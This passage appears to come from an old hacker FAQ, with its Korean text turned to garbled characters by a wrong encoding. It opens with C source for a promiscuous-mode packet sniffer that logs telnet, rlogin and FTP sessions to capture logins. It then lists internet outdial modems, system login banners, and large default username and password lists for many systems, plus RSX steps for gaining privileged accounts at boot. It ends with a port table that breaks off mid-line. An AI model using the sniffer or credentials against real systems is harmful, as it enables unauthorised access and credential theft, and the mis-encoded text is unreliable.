\ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } 18.internet outdialÀº ¹«¾ùÀΰ¡? Internet outdialÀº ÀÎÅͳݿ¡ ¹°·Á ÀÖÀ¸¸é¼­,»ç¿ëÀÚ°¡ ÀÌ¿ëÇÒ ¼ö ÀÖ´Â ¸ðµ©À» ÀǹÌÇÑ´Ù. Normal outdialsÀº ÇØ´ç Áö¿ª¿¡¸¸ ±¹ÇѵÇÁö¸¸,GOD(Global OutDial)Àº Áö¿ª¿¡ Á¦ÇÑÀ» ¹ÞÁö ¾Ê´Â ´Ù. ÀÌ·¯ÇÑ ¹æ¹ýÀº ¸Ö¸® ¶³¾îÁø BBS¿¡ Á¢¼ÓÇÏ´Â ¸Å¿ì °æÁ¦ÀûÀÎ ¹æ¹ýÀÌ´Ù. 19.internet outdial¿¡´Â ¹«¾ùÀÌ Àִ°¡? Area Address(s) Command(s) ------ ------------------------------- --------------------- 201 128.112.88.0 128.112.88.1 128.112.88.2 128.112.88.3 204 umnet.cc.manitoba.ca "dial12" or "dial24" 206 dialout24.cac.washington.edu 215 wiseowl.ocis.temple.edu atz atdt 9xxxyyyy 129.72.1.59 hayes compat 218 aa28.d.umn.edu cli rlogin modem at "login:" type "modem" modem.d.umn.edu "Hayes" 232 isn.rdns.iastate.edu MODEM [Works!!] atz atdt8xxx-xxxx 303 129.82.100.64 login: modem [need password!] 307 modem.uwyo.edu 129.72.1.59 hayes compat 313 35.1.1.6 "dial2400-aa" or [can't connect] "dial1200-aa" 315 198.36.22.3 "modem" 404 emory.edu .modem8 or .dialout broadband.cc.emory.edu .modem8 or .dialout 128.140.1.239 .modem8|CR or .modem96|CR 412 gate.cis.pitt.edu LAT connect dialout ^E atdt 91k xxx-xxxx 415 128.32.132.250 "dial1" or "dial2" 416 pacx.utcs.utoronto.ca modem atdt 9xxx-xxxx 502 uknet.uky.edu outdial2400 atdt 9xxx-xxxx 510 annex132-1.eecs.berkeley.edu atdt 9,,,,, xxx-xxxx 514 132.204.2.11 externe#9 9xxx-xxxx 515 isn.rdns.iastate.edu login MODEM dial atdt8xxx-yyyy 602 129.219.17.3 atdt8,,,,,xyyyxxxyyyy 129.219.17.3 login: MODEM atdt 8xxx-xxxx 609 129.72.1.59 "Hayes" 128.119.131.110 "Hayes" 128.119.131.111 128.119.131.112 128.119.131.113 128.119.131.114 128.112.131.110 128.112.131.111 128.112.131.112 128.112.131.113 128.112.131.114 the above are hayes 614 ns2400.ircc.ohio-state.edu DIAL [can't connect] 615 dca.utk.edu "dial2400" 617 dialout.lcs.mit.edu 619 dialin.ucsd.edu "dialout" 128.54.30.1 nue 713 128.143.70.101 "connect hayes" 128.249.27.154 c modem96 atdt 9xxx-xxxx 128.249.27.153 " -+ as above +- " modem24.bcm.tmc.edu modem12.bcm.tmc.edu 714 130.191.4.70 atdt 8xxx-xxxx 804 ublan.acc.virginia.edu c hayes 128.143.70.101 connect hayes atdt xxx-xxxx 902 star.ccs.tuns.ca "dialout" [down...] 916 128.120.2.251 "dialout" [down...] 129.137.33.72 [can't connect] ??? dialout1.princeton.edu [can't connect] dswitch.byu.edu "C Modem" [can't connect] modem.cis.uflu.edu [can't connect] r596adi1.uc.edu [can't connect] vtnet1.cns.ut.edu "CALL" or "call" [can't connect] 18.26.0.55 [can't connect] 128.173.5.4 [need password!] 128.187.1.2 [need password!] 129.137.33.71 [can't connect] bstorm.bga.com / port=4000 [what is this?] 20.ÀÌ ½Ã½ºÅÛÀº ¾î¶²°ÍµéÀΰ¡? ´ÙÀ½Àº °¢ ½Ã½ºÅÛµéÀÇ ·Î±×ÀÎ È­¸éÀÌ´Ù. AIX ~~~ IBM AIX Version 3 for RISC System/6000 (C) Copyrights by IBM and by others 1982, 1990. login: [You will know an AIX system because it is the only Unix system that] [clears the screen and issues a login prompt near the bottom of the] [screen] AS/400 ~~~~~~ UserID? Password? Once in, type GO MAIN CDC Cyber ~~~~~~~~~ WELCOME TO THE NOS SOFTWARE SYSTEM. COPYRIGHT CONTROL DATA 1978, 1987. 88/02/16. 02.36.53. N265100 CSUS CYBER 170-730. NOS 2.5.2-678/3. FAMILY: You would normally just hit return at the family prompt. Next prompt is: USER NAME: CISCO Router ~~~~~~~~~~~~ FIRST BANK OF TNO 95-866 TNO VirtualBank REMOTE Router - TN043R1 Console Port SN - 00000866 TN043R1> DECserver ~~~~~~~~~ DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1 DPS502-DS700 (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved Please type HELP if you need assistance Enter username> TNO Local> Hewlett Packard MPE-XL ~~~~~~~~~~~~~~~~~~~~~~ MPE XL: EXPECTED A :HELLO COMMAND. (CIERR 6057) MPE XL: EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424) MPE XL: GTN ~~~ WELCOME TO CITIBANK. PLEASE SIGN ON. XXXXXXXX @ PASSWORD = @ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PLEASE ENTER YOUR ID:-1-> PLEASE ENTER YOUR PASSWORD:-2-> CITICORP (CITY NAME). KEY GHELP FOR HELP. XXX.XXX PLEASE SELECT SERVICE REQUIRED.-3-> Lantronix Terminal Server ~~~~~~~~~~~~~~~~~~~~~~~~~ Lantronix ETS16 Version V3.1/1(940623) Type HELP at the 'Local_15> ' prompt for assistance. Login password> Meridian Mail (Northern Telecom Phone/Voice Mail System) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MMM MM MERIDIAN MMMMM MMMMM MMMMMM MMMMMM MMM MMMMM MMM MMMMM MMMMM MMM MMM MMM MMMMMM MMMMMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMMMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM MMM Copyright (c) Northern Telecom, 1991 Novell ONLAN ~~~~~~~~~~~~ N [To access the systems it is best to own a copy of ONLAN/PC] PC-Anywhere ~~~~~~~~~~~ P [To access the systems it is best to own a copy of PCAnywhere Remote] PRIMOS ~~~~~~ PRIMENET 19.2.7F PPOA1 ER! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= CONNECT Primenet V 2.3 (system) LOGIN (you) User id? (system) SAPB5 (you) Password? (system) DROWSAP (you) OK, (system) ROLM-OSL ~~~~~~~~ MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47 RELEASE 8003 OSL, PLEASE. ? System75 ~~~~~~~~ Login: root INCORRECT LOGIN Login: browse Password: Software Version: G3s.b16.2.2 Terminal Type (513, 4410, 4425): [513] Tops-10 ~~~~~~~ NIH Timesharing NIH Tri-SMP 7.02-FF 16:30:04 TTY11 system 1378/1381/1453 Connected to Node Happy(40) Line # 12 Please LOGIN . VM/370 ~~~~~~ VM/370 ! VM/ESA ~~~~~~ VM/ESA ONLINE TBVM2 VM/ESA Rel 1.1 PUT 9200 Fill in your USERID and PASSWORD and press ENTER (Your password will not appear when you type it) USERID ===> PASSWORD ===> COMMAND ===> Xylogics Annex Communications Server ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc. Checking authorization, Please wait... Annex username: TNO Annex password: Permission granted annex: 21.°¢ ½Ã½ºÅÛ¿¡ µû¸¥ ¾îÄ«¿îÆ®´Â ¹«¾ùÀΰ¡? AIX ~~~ guest guest AS/400 ~~~~~~ qsecofr qsecofr /* master security officer */ qsysopr qsysopr /* system operator */ qpgmr qpgmr /* default programmer */ also ibm/password ibm/2222 ibm/service qsecofr/1111111 qsecofr/2222222 qsvr/qsvr secofr/secofr DECserver ~~~~~~~~~ ACCESS SYSTEM Hewlett Packard MPE-XL ~~~~~~~~~~~~~~~~~~~~~~ HELLO MANAGER.SYS HELLO MGR.SYS HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP HELLO OP.OPERATOR MGR CAROLIAN MGR CCC MGR CNAS MGR CONV MGR COGNOS OPERATOR COGNOS MANAGER COGNOS OPERATOR DISC MGR HPDESK MGR HPWORD FIELD HPWORD MGR HPOFFICE SPOOLMAN HPOFFICE ADVMAIL HPOFFICE MAIL HPOFFICE WP HPOFFICE MANAGER HPOFFICE MGR HPONLY FIELD HPP187 MGR HPP187 MGR HPP189 MGR HPP196 MGR INTX3 MGR ITF3000 MANAGER ITF3000 MAIL MAIL MGR NETBASE MGR REGO MGR RJE MGR ROBELLE MANAGER SECURITY MGR SECURITY FIELD SERVICE MANAGER SYS MGR SYS PCUSER SYS RSBCMON SYS OPERATOR SYS OPERATOR SYSTEM FIELD SUPPORT OPERATOR SUPPORT MANAGER TCH MAIL TELESUP MANAGER TELESUP MGR TELESUP SYS TELESUP MGE VESOFT MGE VESOFT MGR WORD MGR XLSERVER Common jobs are Pub, Sys, Data Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote Major BBS ~~~~~~~~~ Sysop Sysop PICK O/S ~~~~~~~~ DSA # Desquetop System Administrator DS DESQUETOP PHANTOM Prolog ~~~~~~ PBX PBX NETWORK NETWORK NETOP Rolm ~~~~ CBX Defaults op op op operator su super admin pwp eng engineer PhoneMail Defaults sysadmin sysadmin tech tech poll tech RSX ~~~ SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM) 1,1/system (Directory [1,1] Password SYSTEM) BATCH/BATCH SYSTEM/MANAGER USER/USER Default accounts for Micro/RSX: MICRO/RSX Alternately you can hit when the boot sequence asks you for the date and create an account using: RUN ACNT or RUN $ACNT (Numbers below 10 {oct} are Priveleged) Reboot and wait for the date/time question. Type ^C and at the MCR prompt, type "abo at." You must include the . dot! If this works, type "acs lb0:/blks=1000" to get some swap space so the new step won't wedge. type " run $acnt" and change the password of any account with a group number of 7 or less. You may find that the ^C does not work. Try ^Z and ESC as well. Also try all 3 as terminators to valid and invalid times. If none of the above work, use the halt switch to halt the system, just after a invalid date-time. Look for a user mode PSW 1[4-7]xxxx. then deposit 177777 into R6, cross your fingers, write protect the drive and continue the system. This will hopefully result in indirect blowing up... And hopefully the system has not been fully secured. System 75 ~~~~~~~~~ bcim bcimpw bciim bciimpw bcms bcmspw, bcms bcnas bcnspw blue bluepw browse looker, browsepw craft crftpw, craftpw, crack cust custpw enquiry enquirypw field support inads indspw, inadspw, inads init initpw kraft kraftpw locate locatepw maint maintpw, rwmaint nms nmspw rcust rcustpw support supportpw tech field Taco Bell ~~~~~~~~~ rgm rollout tacobell Verifone Junior 2.05 ~~~~~~~~~~~~~~~~~~~~ Default password: 166816 VMS ~~~ field service systest utep 22.°¢ Æ÷Æ®¿¡¼­ ÇàÇØÁö´Â ÀÛ¾÷Àº ¹«¾ùÀΰ¡? À¯´Ð½º»óÀÇ /etc/services ÆÄÀÏÀº °¢ port¿¡¼­ ÀϾ´Â ÀϵéÀÌ ±â·ÏµÇ¾î ÀÖ´Ù. ´ÙÀ½Àº ½ÇÁ¦·Î Á¸ÀçÇÏ´Â °¡Àå ¿Ïº®ÇÑ port¸ñ·ÏÀÌ´Ù. Keyword Decimal Description ------- ------- ----------- 0/tcp Reserved 0/udp Reserved tcpmux 1/tcp TCP Port Service Multiplexer tcpmux 1/udp TCP Port Service Multiplexer compressnet 2/tcp Management Utility compressnet 2/udp Management Utility compressnet 3/tcp Compression Process compressnet 3/udp Compression Process 4/tcp Unassigned 4/udp Unassigned rje 5/tcp Remote Job Entry rje 5/udp Remote Job Entry 6/tcp Unassigned 6/udp Unassigned echo 7/tcp Echo echo 7/udp Echo 8/tcp Unassigned 8/udp Unassigned discard 9/tcp Discard discard 9/udp Discard 10/tcp Unassigned 10/udp Unassigned systat 11/tcp Active Users systat 11/udp Active Users 12/tcp Unassigned 12/udp Unassigned daytime 13/tcp Daytime daytime 13/udp Daytime 14/tcp Unassigned 14/udp Unassigned 15/tcp Unassigned [was netstat] 15/udp Unassigned 16/tcp Unassigned 16/udp Unassigned qotd 17/tcp Quote of the Day qotd 17/udp Quote of the Day msp 18/tcp Message Send Protocol msp 18/udp Message Send Protocol chargen 19/tcp Character Generator chargen 19/udp Character Generator ftp-data 20/tcp File Transfer [Default Data] ftp-data 20/udp File Transfer [Default Data] ftp 21/tcp File Transfer [Control] ftp 21/udp File Transfer [Control] 22/tcp Unassigned 22/udp Unassigned telnet 23/tcp Telnet telnet 23/udp Telnet 24/tcp any private mail system 24/udp any private mail system smtp 25/tcp Simple Mail Transfer smtp 25/udp Simple Mail Transfer 26/tcp Unassigned 26/udp Unassigned nsw-fe 27/tcp NSW User System FE nsw-fe 27/udp NSW User System FE 28/tcp Unassigned 28/udp Unassigned msg-icp 29/tcp MSG ICP msg-icp 29/udp MSG ICP 30/tcp Unassigned 30/udp Unassigned msg-auth 31/tcp MSG Authentication msg-auth 31/udp MSG Authentication 32/tcp Unassigned 32/udp Unassigned dsp 33/tcp Display Support Protocol dsp 33/udp Display Support Protocol 34/tcp Unassigned 34/udp Unassigned 35/tcp any private printer server 35/udp any private printer server 36/tcp Unassigned 36/udp Unassigned time 37/tcp Time time 37/udp Time 38/tcp Unassigned 38/udp Unassigned rlp 39/tcp Resource Location Protocol rlp 39/udp Resource Location Protocol 40/tcp Unassigned 40/udp Unassigned graphics 41/tcp Graphics graphics 41/udp Graphics nameserver 42/tcp Host Name Server nameserver 42/udp Host Name Server nicname 43/tcp Who Is nicname 43/udp Who Is mpm-flags 44/tcp MPM FLAGS Protocol mpm-flags 44/udp MPM FLAGS Protocol mpm 45/tcp Message Processing Module [recv] mpm 45/udp Message Processing Module [recv] mpm-snd 46/tcp MPM [default send] mpm-snd 46/udp MPM [default send] ni-ftp 47/tcp NI FTP ni-ftp 47/udp NI FTP 48/tcp Unassigned 48/udp Unassigned login 49/tcp Login Host Protocol login 49/udp Login Host Protocol re-mail-ck 50/tcp Remote Mail Checking Protocol re-mail-ck 50/udp Remote Mail Checking Protocol la-maint 51/tcp IMP Logical Address Maintenance la-maint 51/udp IMP Logical Address Maintenance xns-time 52/tcp XNS Time Protocol xns-time 52/udp XNS Time Protocol domain 53/tcp Domain Name Server domain 53/udp Domain Name Server xns-ch 54/tcp XNS Clearinghouse xns-ch 54/udp XNS Clearinghouse isi-gl 55/tcp ISI Graphics Language isi-gl 55/udp ISI Graphics Language xns-auth 56/tcp XNS Authentication xns-auth 56/udp XNS Authentication 57/tcp any private terminal access 57/udp any private terminal access xns-mail 58/tcp XNS Mail xns-mail 58/udp XNS Mail 59/tcp any private file service 59/udp any private file service 60/tcp Unassigned 60/udp Unassigned ni-mail 61/tcp NI MAIL ni-mail 61/udp NI MAIL acas 62/tcp ACA Services acas 62/udp ACA Services via-ftp 63/tcp VIA Systems - FTP via-ftp 63/udp VIA Systems - FTP covia 64/tcp Communications Integrator (CI) covia 64/udp Communications Integrator (CI) tacacs-ds 65/tcp TACACS-Database Service tacacs-ds 65/udp TACACS-Database Service sql*net 66/tcp Oracle SQL*NET sql*net 66/udp Oracle SQL*NET bootps 67/tcp Bootstrap Protocol Server bootps 67/udp Bootstrap Protocol Server bootpc 68/tcp Bootstrap Protocol Client bootpc 68/udp Bootstrap Protocol Client tftp 69/tcp Trivial File Transfer tftp 69/udp Trivial File Transfer gopher 70/tcp Gopher gopher 70/udp Gopher netrjs-1 71/tcp Remote Job Service netrjs-1 71/udp Remote Job Service netrjs-2 72/tcp Remote Job Service netrjs-2 72/udp Remote Job Service netrjs-3 73/tcp Remote Job Service netrjs-3 73/udp Remote Job Service netrjs-4 74/tcp Remote Job Service netrjs-4 74/udp Remote Job Service 75/tcp any private dial out service 75/udp any private dial out service 76/tcp Unassigned 76/udp Unassigned 77/tcp any private RJE service 77/udp any private RJE service vettcp 78/tcp vettcp vettcp 78/udp vettcp finger 79/tcp Finger finger 79/udp Finger www 80/tcp World Wide Web HTTP www 80/udp World Wide Web HTTP hosts2-ns 81/tcp HOSTS2 Name Server hosts2-ns 81/udp HOSTS2 Name Server xfer 82/tcp XFER Utility xfer 82/udp XFER Utility mit-ml-dev 83/tcp MIT ML Device mit-ml-dev 83/udp MIT ML Device ctf 84/tcp Common Trace Facility ctf 84/udp Common Trace Facility mit-ml-dev 85/tcp MIT ML Device mit-ml-dev 85/udp MIT ML Device mfcobol 86/tcp Micro Focus Cobol mfcobol 86/udp Micro Focus Cobol 87/tcp any private terminal link 87/udp any private terminal link kerberos 88/tcp Kerberos kerberos 88/udp Kerberos su-mit-tg 89/tcp SU/MIT Telnet Gateway su-mit-tg 89/udp SU/MIT Telnet Gateway dnsix 90/tcp DNSIX Securit Attribute Token Map dnsix 90/udp DNSIX Securit Attribute Token Map mit-dov 91/tcp MIT Dover Spooler mit-dov 91/udp MIT Dover Spooler npp 92/tcp Network Printing Protocol npp 92/udp Network Printing Protocol dcp 93/tcp Device Control Protocol dcp 93/udp Device Control Protocol objcall 94/tcp Tivoli Object Dispatcher objcall 94/udp Tivoli Object Dispatcher supdup 95/tcp SUPDUP supdup 95/udp SUPDUP dixie 96/tcp DIXIE Protocol Specification dixie 96/udp DIXIE Protocol Specification swift-rvf 97/tcp Swift Remote Vitural File Protocol swift-rvf 97/udp Swift Remote Vitural File Protocol tacnews 98/tcp TAC News tacnews 98/udp TAC News metagram 99/tcp Metagram Relay metagram 99/udp Metagram Relay newacct 100/tcp [unauthorized use] hostname 101/tcp NIC Host Name Server hostname 101/udp NIC Host Name Server iso-tsap 102/tcp ISO-TSAP iso-tsap 102/udp ISO-TSAP gppitnp 103/tcp Genesis Point-to-Point Trans Net gppitnp 103/udp Genesis Point-to-Point Trans Net acr-nema 104/tcp ACR-NEMA Digital Imag. & Comm. 300 acr-nema 104/udp ACR-NEMA Digital Imag. & Comm. 300 csnet-ns 105/tcp Mailbox Name Nameserver csnet-ns 105/udp Mailbox Name Nameserver 3com-tsmux 106/tcp 3COM-TSMUX 3com-tsmux 106/udp 3COM-TSMUX rtelnet 107/tcp Remote Telnet Service rtelnet 107/udp Remote Telnet Service snagas 108/tcp SNA Gateway Access Server snagas 108/udp SNA Gateway Access Server pop2 109/tcp Post Office Protocol - Version 2 pop2 109/udp Post Office Protocol - Version 2 pop3 110/tcp Post Office Protocol - Version 3 pop3 110/udp Post Office Protocol - Version 3 sunrpc 111/tcp SUN Remote Procedure Call sunrpc 111/udp SUN Remote Procedure Call mcidas 112/tcp McIDAS Data Transmission Protocol mcidas 112/udp McIDAS Data Transmission Protocol auth 113/tcp Authentication Service auth 113/udp Authentication Service audionews 114/tcp Audio News Multicast audionews 114/udp Audio News Multicast sftp 115/tcp Simple File Transfer Protocol sftp 115/udp Simple File Transfer Protocol ansanotify 116/tcp ANSA REX Notify ansanotify 116/udp ANSA REX Notify uucp-path 117/tcp UUCP Path Service uucp-path 117/udp UUCP Path Service sqlserv 118/tcp SQL Services sqlserv 118/udp SQL Services nntp 119/tcp Network News Transfer Protocol nntp 119/udp Network News Transfer Protocol cfdptkt 120/tcp CFDPTKT cfdptkt 120/udp CFDPTKT erpc 121/tcp Encore Expedited Remote Pro.Call erpc 121/udp Encore Expedited Remote Pro.Call smakynet 122/tcp SMAKYNET smakynet 122/udp SMAKYNET ntp 123/tcp Network Time Protocol ntp 123/udp Network Time Protocol ansatrader 124/tcp ANSA REX Trader ansatrader 124/udp ANSA REX Trader locus-map 125/tcp Locus PC-Interface Net Map Ser locus-map 125/udp Locus PC-Interface Net Map Ser unitary 126/tcp Unisys Unitary Login unitary 126/udp Unisys Unitary Login locus-con 127/tcp Locus PC-Interface Conn Server locus-con 127/udp Locus PC-Interface Conn Server gss-xlicen 128/tcp GSS X License Verification gss-xlicen 128/udp GSS X License Verification pwdgen 129/tcp Password Generator Protocol pwdgen 129/udp Password Generator Protocol cisco-fna 130/tcp cisco FNATIVE cisco-fna 130/udp cisco FNATIVE cisco-tna 131/tcp cisco TNATIVE cisco-tna 131/udp cisco TNATIVE cisco-sys 132/tcp cisco SYSMAINT cisco-sys 132/udp cisco SYSMAINT statsrv 133/tcp Statistics Service statsrv 133/udp Statistics Service ingres-net 134/tcp INGRES-NET Service ingres-net 134/udp INGRES-NET Service loc-srv 135/tcp Location Service loc-srv 135/udp Location Service profile 136/tcp PROFILE Naming System profile 136/udp PROFILE Naming System netbios-ns 137/tcp NETBIOS Name Service netbios-ns 137/udp NETBIOS Name Service netbios-dgm 138/tcp NETBIOS Datagram Service netbios-dgm 138/udp NETBIOS Datagram Service netbios-ssn 139/tcp NETBIOS Session Service netbios-ssn 139/udp NETBIOS Session Service emfis-data 140/tcp EMFIS Data Service emfis-data 140/udp EMFIS Data Service emfis-cntl 141/tcp EMFIS Control Service emfis-cntl 141/udp EMFIS Control Service bl-idm 142/tcp Britton-Lee IDM bl-idm 142/udp Britton-Lee IDM imap2 143/tcp Interim Mail Access Protocol v2 imap2 143/udp Interim Mail Access Protocol v2 news 144/tcp NewS news 144/udp NewS uaac 145/tcp UAAC Protocol uaac 145/udp UAAC Protocol iso-tp0 146/tcp ISO-IP0 iso-tp0 146/udp ISO-IP0 iso-ip 147/tcp ISO-IP iso-ip 147/udp ISO-IP cronus 148/tcp CRONUS-SUPPORT cronus 148/udp CRONUS-SUPPORT aed-512 149/tcp AED 512 Emulation Service aed-512 149/udp AED 512 Emulation Service sql-net 150/tcp SQL-NET sql-net 150/udp SQL-NET hems 151/tcp HEMS hems 151/udp HEMS bftp 152/tcp Background File Transfer Program bftp 152/udp Background File Transfer Program sgmp 153/tcp SGMP sgmp 153/udp SGMP netsc-prod 154/tcp NETSC netsc-prod 154/udp NETSC netsc-dev 155/tcp NETSC netsc-dev 155/udp NETSC sqlsrv 156/tcp SQL Service sqlsrv 156/udp SQL Service knet-cmp 157/tcp KNET/VM Command/Message Protocol knet-cmp 157/udp KNET/VM Command/Message Protocol pcmail-srv 158/tcp PCMail Server pcmail-srv 158/udp PCMail Server nss-routing 159/tcp NSS-Routing nss-routing 159/udp NSS-Routing sgmp-traps 160/tcp SGMP-TRAPS sgmp-traps 160/udp SGMP-TRAPS snmp 161/tcp SNMP snmp 161/udp SNMP snmptrap 162/tcp 